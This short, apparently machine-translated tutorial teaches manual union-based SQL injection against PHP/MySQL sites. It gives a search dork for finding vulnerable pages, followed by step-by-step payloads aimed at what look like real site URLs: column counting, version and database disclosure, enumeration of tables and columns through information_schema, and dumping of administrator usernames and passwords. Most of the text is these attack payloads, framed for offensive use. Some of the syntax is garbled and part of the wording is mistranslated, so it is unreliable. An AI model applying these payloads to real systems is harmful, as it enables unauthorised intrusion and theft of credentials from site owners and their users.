Php manual injection MYSQL5.0 Injection

We use examples to illustrate the manual injection of PHP websites. I personally feel that graphic tutorials are more intuitive than videos, but the example websites are more practical.

Tools used: google snoop
Use statement: site: heib0y.com inurl: php to find the injection point
First, add'

Http://www.bkjia.com/products/shop. php? C = misc & id = 8 ′

Error

And 1 = 1 and 1 = 2 a normal one error very obvious injection points

Step 2: Increase order by 1 until the error value is 12. The description is 11.

Step 3: id = 8 and 1 = 2 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11-

Numbers 5 and 8 appear on the page,

Use the built-in function user () at Location 5 to reveal the current database account

Database () and version () can be used to replace the database Name and MYSQL version ()
5.1.66-community-log

Step 4: with the database name and version 5.0 and later, we can quickly expose all the table names. The syntax is

Php? Id = 72 and 1 = 2 union select 1, 2, 3, 4, group_concat (table_name) 6, 7, 8, 9, 10, 11 from information_schema.tables where table_schema = 0x68706F6C

0x68706F6C The hexadecimal encoding format of the database. Just encode it with xiaokui.

Find the sensitive table name, such as admin user admins, and the statement used for the management field is

Php? Id = 72 and 1 = 2 union select 1, group_concat (column_name), 3,4, 5 from information_schema.columns where table_name = 0x61646D696E6973747261746F72/* The hexadecimal representation of the table name */

The fields shown here are password and name.

Last step: Let's take a look at the account and password of the website administrator. Here is the dual-violence field.

Statement:

And 1 = 2 union select 1, 2, 3, 4, 5, 6, 7, group_concat (name, 0x3a, password), 9, 10, 11 from admins